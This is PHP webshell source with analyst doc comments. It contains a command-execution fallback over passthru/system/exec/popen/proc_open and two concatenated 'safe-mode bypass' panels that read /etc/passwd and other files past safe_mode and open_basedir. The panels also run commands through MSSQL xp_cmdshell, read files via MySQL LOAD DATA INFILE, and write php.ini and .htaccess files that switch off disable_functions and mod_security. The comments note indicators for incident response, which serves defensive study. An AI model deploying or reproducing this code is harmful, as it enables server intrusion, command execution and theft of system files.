/**
 * Command-execution fallback chain (webshell primitive).
 *
 * Runs $command through the first execution function that function_exists()
 * reports as present, in this order: passthru, system, exec, shell_exec,
 * popen, proc_open, then (Windows only, by PHP_OS prefix) win_shell_execute,
 * win32_create_service and the FFI extension, then the perl extension. The
 * Windows and perl branches delegate to winshelL(), srvshelL(), ffishelL()
 * and perlshelL(), which are defined elsewhere in the shell and are not
 * visible here.
 *
 * Analyst notes on what the code actually does (documented, not fixed):
 *  - Every primitive is called with @, so a disabled or failing primitive
 *    degrades silently into an empty result rather than an error. Whether a
 *    disable_functions entry makes function_exists() return false depends on
 *    the PHP version, so a disabled branch may still be entered and yield ''.
 *  - system branch: the buffer contents captured *before* system() runs are
 *    what is returned ($exec = $tmp); the command output is read into $output
 *    and then dropped. No ob_start() precedes it, so with no buffer active
 *    ob_get_contents() returns false.
 *  - popen branch: $exec is overwritten on every fgets(), so at most the last
 *    line of output comes back.
 *  - $dep (the stdin/stdout pipe spec) is built unconditionally but only used
 *    by the proc_open branch.
 *  - $command is passed to the shell exactly as received, with no quoting.
 *  - A function_exists() cascade over passthru/system/exec/shell_exec/popen/
 *    proc_open is a well-known webshell signature; a disable_functions list
 *    that omits any one of them leaves this path usable.
 *
 * @param string $command shell command line, passed through unescaped
 * @return string|false captured output, '' when no primitive produced any
 */
function Exe($command) { $exec = $output = ''; $dep[] = array('pipe', 'r'); $dep[] = array('pipe', 'w'); if (function_exists('passthru')) { ob_start(); @passthru($command); $exec = ob_get_contents(); ob_clean(); ob_end_clean(); } elseif (function_exists('system')) { $tmp = ob_get_contents(); ob_clean(); @system($command); $output = ob_get_contents(); ob_clean(); $exec = $tmp; } elseif (function_exists('exec')) { @exec($command, $output); $output = join("\n", $output); $exec = $output; } elseif (function_exists('shell_exec')) { $exec = @shell_exec($command); } elseif (function_exists('popen')) { $output = @popen($command, 'r'); while (!feof($output)) { $exec = fgets($output); } pclose($output); } elseif (function_exists('proc_open')) { $res = @proc_open($command, $dep, $pipes); while (!feof($pipes[1])) { $line = fgets($pipes[1]); $output .= $line; } $exec = $output; proc_close($res); } elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $exec = winshelL($command); } elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $exec = srvshelL($command); } elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $exec = ffishelL($command); } elseif (extension_loaded('perl')) { $exec = perlshelL($command); } return $exec; }
/**
 * "Safe-mode bypass" panel, variant A (table / <font> layout).
 *
 * NOTE: a second function with this exact name is declared further down in
 * this file. PHP does not permit redeclaration, so this listing reads as two
 * shell variants concatenated together rather than one runnable file.
 *
 * Takes $_REQUEST['file'] (default /etc/passwd) and, depending on which
 * submit button was sent, runs a battery of techniques that try to read the
 * file or list around it despite safe_mode / open_basedir / disable_functions,
 * echoing each result under a "Method N:(technique)" heading. $t, $hcwd and
 * $et are HTML-layout globals populated elsewhere; $windows is imported but
 * not used in this variant.
 *
 * Branches, and the side effects / on-disk artifacts each leaves (useful for
 * incident response):
 *  read  - ini_restore('safe_mode'/'open_basedir') then readfile(); include
 *          of the user-supplied path (executes any PHP it contains); copy()
 *          through the compress.zlib:// wrapper into a tempnam('', 'cx') file
 *          that is never unlinked; mb_send_mail() with extra sendmail flags,
 *          which leaves /tmp/mb_send_mail behind (the '-C $file' argument is
 *          single-quoted, so the literal text "$file" is sent, not the path);
 *          curl file:// reads, one of them a ../ traversal from $file back to
 *          __FILE__; a php.ini containing "safe_mode = Off" written to the
 *          cwd and deleted again right after readfile(); COM WScript.Shell,
 *          win32std and win32service "type" commands; imap_open() on
 *          /etc/passwd followed by imap_list()/imap_body(); and, when the
 *          target is /etc/passwd, posix_getpwuid() for uid 0..99998 to
 *          reconstruct the account list.
 *  show  - glob("$file*"); imap_list() with "mailbox|pattern" split on '|';
 *          COM / win32std / win32service "dir" commands.
 *  sql   - mysql_connect('localhost', user, pass), CREATE TEMPORARY TABLE
 *          uniqid('N'), LOAD DATA INFILE of the requested path (addslashes'd)
 *          and SELECT it back; needs the MySQL FILE privilege.
 *  mssql - mssql_connect(server, user, pass), CREATE TABLE uniqid('NJ'),
 *          "insert into ... EXEC master.dbo.xp_cmdshell '<coM>'" with the
 *          command interpolated unescaped, rows read back, DROP TABLE.
 *
 * Observed defects in this variant (left as-is, noted for analysts):
 *  - new COM('WScript.Shell') is called with no class_exists() guard, so on
 *    a PHP build without the COM class the read and show branches stop with
 *    a class-not-found error at that point, after the earlier methods have
 *    already run.
 *  - The imap_list() loops reuse $i as their index, clobbering the
 *    "Method N" counter for everything printed afterwards.
 *  - In the show branch, the single-pattern case calls trim($str[0]) where
 *    $str is the imap connection handle rather than the path.
 *  - mysql_* and mssql_* were removed in PHP 7, so on modern PHP those two
 *    branches fail before any query is issued.
 *
 * Hard-coded form defaults (MySQL cbfteam / 123456 / test, MSSQL sa with
 * 'dir c:') are usable string indicators for this shell family.
 */
function safemodE() { global $windows, $t, $hcwd, $et; $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file']; $pr = "\r\n</font><font color=green>Method "; $po = ")</font><font color=blue>\r\n"; $i = 1; if (!empty($_REQUEST['read'])) { echo "<pre>{$pr}{$i}:(ini_restore{$po}"; ini_restore('safe_mode'); ini_restore('open_basedir'); readfile($file); $i++; echo "{$pr}{$i}:(include{$po}"; include $file; $i++; echo "{$pr}{$i}:(copy{$po}"; $tmp = tempnam('', 'cx'); copy('compress.zlib://' . $file, $tmp); $fh = fopen($tmp, 'r'); $data = fread($fh, filesize($tmp)); fclose($fh); echo $data; $i++; if (function_exists('mb_send_mail')) { echo "{$pr}{$i}:(mb_send_mail{$po}"; if (file_exists('/tmp/mb_send_mail')) { unlink('/tmp/mb_send_mail'); } mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail'); readfile('/tmp/mb_send_mail'); $i++; } if (function_exists('curl_init')) { echo "{$pr}{$i}:(curl_init [A]{$po}"; $fh = curl_init('file://' . $file . ''); $tmp = curl_exec($fh); echo $tmp; $i++; echo "{$pr}{$i}:(curl_init [B]{$po}"; $i++; if (strstr($file, DIRECTORY_SEPARATOR)) { $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__); } else { $ch = curl_init('file://' . $file . "" . 
__FILE__); } var_dump(curl_exec($ch)); } if (is_writable('.')) { echo "{$pr}{$i}:(php.ini{$po}"; file_put_contents('php.ini', 'safe_mode = Off'); readfile($file); unlink('php.ini'); $i++; } if (is_object($ws = new COM('WScript.Shell'))) { echo "{$pr}{$i}:(COM{$po}"; echo $exec = comshelL("type \"{$file}\"", $ws); $i++; } if (checkfunctioN('win_shell_execute')) { echo "{$pr}{$i}:(win32std{$po}"; echo winshelL("type \"{$file}\""); $i++; } if (checkfunctioN('win32_create_service')) { echo "{$pr}{$i}:(win32service{$po}"; echo srvshelL("type \"{$file}\""); $i++; } if (function_exists('imap_open')) { echo "{$pr}{$i}:(imap [A]{$po}"; $str = imap_open('/etc/passwd', '', ''); $list = imap_list($str, $file, '*'); for ($i = 0; $i < count($list); $i++) { echo $list[$i] . "\n"; } imap_close($str); $i++; echo "{$pr}{$i}:(imap [B]{$po}"; $str = imap_open($file, '', ''); $tmp = imap_body($str, 1); echo $tmp; imap_close($str); $i++; } if ($file == '/etc/passwd') { echo "{$pr}{$i}:(posix{$po}"; for ($uid = 0; $uid < 99999; $uid++) { $h = posix_getpwuid($uid); if (!empty($h)) { foreach ($h as $v) { echo "{$v}:"; } } echo "\r\n"; } } echo "\n</pre></font>"; } elseif (!empty($_REQUEST['show'])) { echo "<pre>{$pr}{$i}:(glob{$po}"; $con = glob("{$file}*"); foreach ($con as $v) { echo "{$v}\n"; } $i++; if (function_exists('imap_open')) { echo "{$pr}{$i}:(imap{$po}"; $str = imap_open('/etc/passwd', '', ''); $s = explode("|", $file); if (count($s) > 1) { $list = imap_list($str, trim($s[0]), trim($s[1])); } else { $list = imap_list($str, trim($str[0]), '*'); } for ($i = 0; $i < count($list); $i++) { echo "{$list[$i]}\r\n"; } imap_close($str); $i++; } if (is_object($ws = new COM('WScript.Shell'))) { echo "{$pr}{$i}:(COM{$po}"; $exec = comshelL("dir \"{$file}\"", $ws); $exec = str_replace("\t", '', $exec); echo $exec; $i++; } if (checkfunctioN('win_shell_execute')) { echo "{$pr}{$i}:(win32std{$po}"; echo winshelL("dir \"{$file}\""); $i++; } if (checkfunctioN('win32_create_service')) { echo 
"{$pr}{$i}:(win32service{$po}"; echo srvshelL("dir \"{$file}\""); $i++; } echo "\n</pre></font>"; } elseif (!empty($_REQUEST['sql'])) { $ta = uniqid('N'); $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}"); $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']); mysql_select_db($_REQUEST['db'], $l); echo '<pre><font color=blue>'; foreach ($s as $v) { $q = mysql_query($v, $l); while ($d = mysql_fetch_row($q)) { echo htmlspecialchars($d[0]); } } echo '</pre></font>'; } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) { $res = ''; $tb = uniqid('NJ'); $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']); mssql_select_db($_REQUEST['dB'], $db); mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db); mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db); $re = mssql_query("select * from {$tb}", $db); while ($row = mssql_fetch_row($re)) { $res .= $row[0] . "\r\n"; } mssql_query("drop table {$tb}", $db); mssql_close($db); echo "<center><textarea rows='18' cols='64'>{$res}</textarea></center><br>"; } $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd'; $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'cbfteam'; $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456'; $d = !empty($_REQUEST['db']) ? 
htmlspecialchars($_REQUEST['db']) : 'test'; echo "<center>{$t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>{$hcwd}<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>{$et}<br>{$t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='{$u}'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='{$p}'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='{$d}'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>{$hcwd}<input class=buttons type=submit name=sql value='Read'></form>{$et}<br>{$t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='"; if (!empty($_REQUEST['serveR'])) { echo htmlspecialchars($_REQUEST['serveR']); } else { echo 'localhost'; } echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='"; if (!empty($_REQUEST['useR'])) { echo htmlspecialchars($_REQUEST['useR']); } else { echo 'sa'; } echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='"; if (!empty($_REQUEST['pasS'])) { echo htmlspecialchars($_REQUEST['pasS']); } echo "' size=35></td></tr><td width='20%' 
bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='"; if (!empty($_REQUEST['coM'])) { echo htmlspecialchars($_REQUEST['coM']); } else { echo 'dir c:'; } echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='"; if (isset($_REQUEST['dB'])) { echo htmlspecialchars($_REQUEST['dB']); } else { echo 'master'; } echo "'> {$hcwd}<input class=buttons type=submit value='Execute'></form>{$et}</center>"; }
/**
 * "Safe-mode bypass" panel, variant B (div / label layout).
 *
 * Redeclares safemodE() from the variant above (PHP would refuse to load a
 * file containing both). Same request parameters and the same read / show /
 * sql / mssql branches; this version differs as follows:
 *  - read   additionally tries ioncube_read_file(); a symlink trick (link
 *           named uniqid('lnk_') created under whereistmP(), read, then
 *           unlinked); and, instead of the COM / win32 "type" methods,
 *           shelL("type \"$file\"") when the $windows global is set or
 *           shelL("cat $file") otherwise, with $file interpolated into the
 *           command line unescaped. Availability checks go through
 *           checkfunctioN() rather than function_exists(). The posix loop
 *           only prints a line for uids that resolve and omits the trailing
 *           colon after the shell field.
 *  - show   guards the COM method with class_exists('COM') before
 *           instantiating WScript.Shell.
 *  - create (new) writes three files next to the script, in
 *           dirname(__FILE__): php.ini and ini.ini, each containing
 *           safe_mode = Off / disable_functions = NONE / safe_mode_gid = Off /
 *           open_basedir = Off, and a .htaccess whose <IfModule
 *           mod_security.c> block turns off SecFilterEngine, SecFilterScanPOST
 *           and the cookie / URL / Unicode encoding checks (mod_security 1.x
 *           directives). None of them are removed afterwards, so they are
 *           durable on-disk indicators of this shell having been used.
 *  - sql / mssql are identical to variant A; the default MySQL username in
 *           the form is 'root' instead of 'cbfteam'.
 *
 * shelL(), checkfunctioN(), whereistmP(), comshelL(), winshelL() and
 * srvshelL() are helpers defined elsewhere in the shell and are not visible
 * here. The $i-clobbering imap_list() loops, the trim($str[0]) call on the
 * imap handle, the never-unlinked tempnam('', 'cx') copy, the single-quoted
 * '-C $file' mb_send_mail argument, and the reliance on the PHP-7-removed
 * mysql_* / mssql_* extensions all carry over unchanged from variant A.
 */
function safemodE() { global $windows, $hcwd; $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file']; $pr = "\r\n</font><font color=green>Method "; $po = ")</font><font color=#FA0>\r\n"; $i = 1; if (!empty($_REQUEST['read'])) { echo "<pre>{$pr}{$i}:(ini_restore{$po}"; ini_restore('safe_mode'); ini_restore('open_basedir'); readfile($file); $i++; if (checkfunctioN("ioncube_read_file")) { echo "{$pr}{$i}:(ionCube{$po}"; echo ioncube_read_file($file); $i++; } if (checkfunctioN('symlink')) { echo "{$pr}{$i}:(symlink{$po}"; $lnk = whereistmP() . DIRECTORY_SEPARATOR . uniqid('lnk_'); @symlink($file, $lnk); @readfile($lnk); @unlink($lnk); $i++; } echo "{$pr}{$i}:(include{$po}"; include $file; $i++; echo "{$pr}{$i}:(copy{$po}"; $tmp = tempnam('', 'cx'); copy('compress.zlib://' . $file, $tmp); $fh = fopen($tmp, 'r'); $data = fread($fh, filesize($tmp)); fclose($fh); echo $data; $i++; if (checkfunctioN('mb_send_mail')) { echo "{$pr}{$i}:(mb_send_mail{$po}"; if (file_exists('/tmp/mb_send_mail')) { unlink('/tmp/mb_send_mail'); } mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail'); readfile('/tmp/mb_send_mail'); $i++; } if (checkfunctioN('curl_init')) { echo "{$pr}{$i}:(curl_init [A]{$po}"; $fh = curl_init('file://' . $file . ''); $tmp = curl_exec($fh); echo $tmp; $i++; echo "{$pr}{$i}:(curl_init [B]{$po}"; $i++; if (strstr($file, DIRECTORY_SEPARATOR)) { $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__); } else { $ch = curl_init('file://' . $file . "" . __FILE__); } var_dump(curl_exec($ch)); } if ($windows) { echo "{$pr}{$i}:(shell{$po}"; echo shelL("type \"{$file}\""); $i++; } else { echo "{$pr}{$i}:(shell{$po}"; echo shelL("cat {$file}"); $i++; } if (checkfunctioN('imap_open')) { echo "{$pr}{$i}:(imap [A]{$po}"; $str = imap_open('/etc/passwd', '', ''); $list = imap_list($str, $file, '*'); for ($i = 0; $i < count($list); $i++) { echo $list[$i] . 
"\n"; } imap_close($str); $i++; echo "{$pr}{$i}:(imap [B]{$po}"; $str = imap_open($file, '', ''); $tmp = imap_body($str, 1); echo $tmp; imap_close($str); $i++; } if ($file == '/etc/passwd') { echo "{$pr}{$i}:(posix{$po}"; for ($uid = 0; $uid < 99999; $uid++) { $h = posix_getpwuid($uid); if (!empty($h)) { foreach ($h as $k => $v) { echo "{$v}"; if ($k != 'shell') { echo ":"; } } echo "\r\n"; } } } echo "\n</pre></font>"; } elseif (!empty($_REQUEST['show'])) { echo "<pre>{$pr}{$i}:(glob{$po}"; $con = glob("{$file}*"); foreach ($con as $v) { echo "{$v}\n"; } $i++; if (checkfunctioN('imap_open')) { echo "{$pr}{$i}:(imap{$po}"; $str = imap_open('/etc/passwd', '', ''); $s = explode("|", $file); if (count($s) > 1) { $list = imap_list($str, trim($s[0]), trim($s[1])); } else { $list = imap_list($str, trim($str[0]), '*'); } for ($i = 0; $i < count($list); $i++) { echo "{$list[$i]}\r\n"; } imap_close($str); $i++; } if (class_exists('COM')) { echo "{$pr}{$i}:(COM{$po}"; $ws = new COM('WScript.Shell'); $exec = comshelL("dir \"{$file}\"", $ws); $exec = str_replace("\t", '', $exec); echo $exec; $i++; } if (checkfunctioN('win_shell_execute')) { echo "{$pr}{$i}:(win32std{$po}"; echo winshelL("dir \"{$file}\""); $i++; } if (checkfunctioN('win32_create_service')) { echo "{$pr}{$i}:(win32service{$po}"; echo srvshelL("dir \"{$file}\""); } echo "\n</pre></font>"; } elseif (!empty($_REQUEST['create'])) { $i = 1; $dir = dirname(__FILE__) . DIRECTORY_SEPARATOR; if (is_writable($dir)) { echo "<pre>{$pr}{$i}:(php.ini{$po}"; file_put_contents($dir . 'php.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off"); echo "\nphp.ini created!\n"; $i++; echo "{$pr}{$i}:(ini.ini{$po}"; file_put_contents($dir . 'ini.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off"); echo "\nini.ini created!\n"; $i++; echo "{$pr}{$i}:(.htaccess{$po}"; file_put_contents($dir . 
'.htaccess', "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckCookieFormat Off\r\nSecFilterNormalizeCookies Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>"); echo "\n.htaccess created!\n"; echo "\nCheck if safe-mode is off.\n</pre></font>"; } else { echo "Local directory is not writable!"; } } elseif (!empty($_REQUEST['sql'])) { $ta = uniqid('N'); $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}"); $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']); mysql_select_db($_REQUEST['db'], $l); echo '<pre><font color=#FA0>'; foreach ($s as $v) { $q = mysql_query($v, $l); while ($d = mysql_fetch_row($q)) { echo htmlspecialchars($d[0]); } } echo '</pre></font>'; } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) { $res = ''; $tb = uniqid('NJ'); $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']); mssql_select_db($_REQUEST['dB'], $db); mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db); mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db); $re = mssql_query("select * from {$tb}", $db); while ($row = mssql_fetch_row($re)) { $res .= $row[0] . "\r\n"; } mssql_query("drop table {$tb}", $db); mssql_close($db); echo "<div align=center><textarea rows='18' cols='64'>{$res}</textarea></div><br>"; } $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd'; $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'root'; $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456'; $d = !empty($_REQUEST['db']) ? 
htmlspecialchars($_REQUEST['db']) : 'test'; echo ' <form name="client" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">Disable safe-mode & mod_sec</label> </div><div class="fieldwrapper"> <label class="styled">Create config files:</label> <div class="thefield"> php.ini<br /> ini.ini<br /> .htaccess<br /> </div> </div>' . $hcwd . '<div class="buttonsdiv"> <input type="submit" name="create" value="Create" style="margin-left: 150px;" /> </div> </form> <br /> <form name="client" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">Use PHP Bugs</label> </div><div class="fieldwrapper"> <label class="styled">File:</label> <div class="thefield"> <input type="text" name="file" value="' . $f . '" size="30" /> </div> </div>' . $hcwd . '<div class="buttonsdiv"> <input type="submit" name="read" value="Read File" style="margin-left: 150px;" /> </div> <div class="buttonsdiv"> <input type="submit" name="show" value="List directory" style="margin-left: 150px;" /> </div> </form> <br /> <form name="client1" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">Use MySQL</label> </div><div class="fieldwrapper"> <label class="styled">File:</label> <div class="thefield"> <input type="text" name="file" value="' . $f . '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" value="' . $u . '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Password:</label> <div class="thefield"> <input type="text" name="pass" value="' . $p . '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Database:</label> <div class="thefield"> <input type="text" name="db" value="' . $d . '" size="30" /> </div> </div>' . $hcwd . 
' <div class="buttonsdiv"> <input type="submit" name="sql" value="Read" style="margin-left: 150px;" /> </div> </form> <br /> <form name="client2" method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">MSSQL Exec</label> </div><div class="fieldwrapper"> <label class="styled">Server:</label> <div class="thefield"> <input type="text" name="serveR" value="'; if (!empty($_REQUEST['serveR'])) { echo htmlspecialchars($_REQUEST['serveR']); } else { echo 'localhost'; } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="useR" value="'; if (!empty($_REQUEST['useR'])) { echo htmlspecialchars($_REQUEST['useR']); } else { echo 'sa'; } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Password:</label> <div class="thefield"> <input type="text" name="pasS" value="'; if (!empty($_REQUEST['pasS'])) { echo htmlspecialchars($_REQUEST['pasS']); } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Command:</label> <div class="thefield"> <input type="text" name="coM" value="'; if (!empty($_REQUEST['coM'])) { echo htmlspecialchars($_REQUEST['coM']); } else { echo 'dir c:'; } echo '" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled">Database:</label> <div class="thefield"> <input type="text" name="dB" value="'; if (!empty($_REQUEST['dB'])) { echo htmlspecialchars($_REQUEST['dB']); } else { echo 'master'; } echo '" size="30" /> </div> </div>' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" value="Execute" style="margin-left: 150px;" /> </div> </form> '; }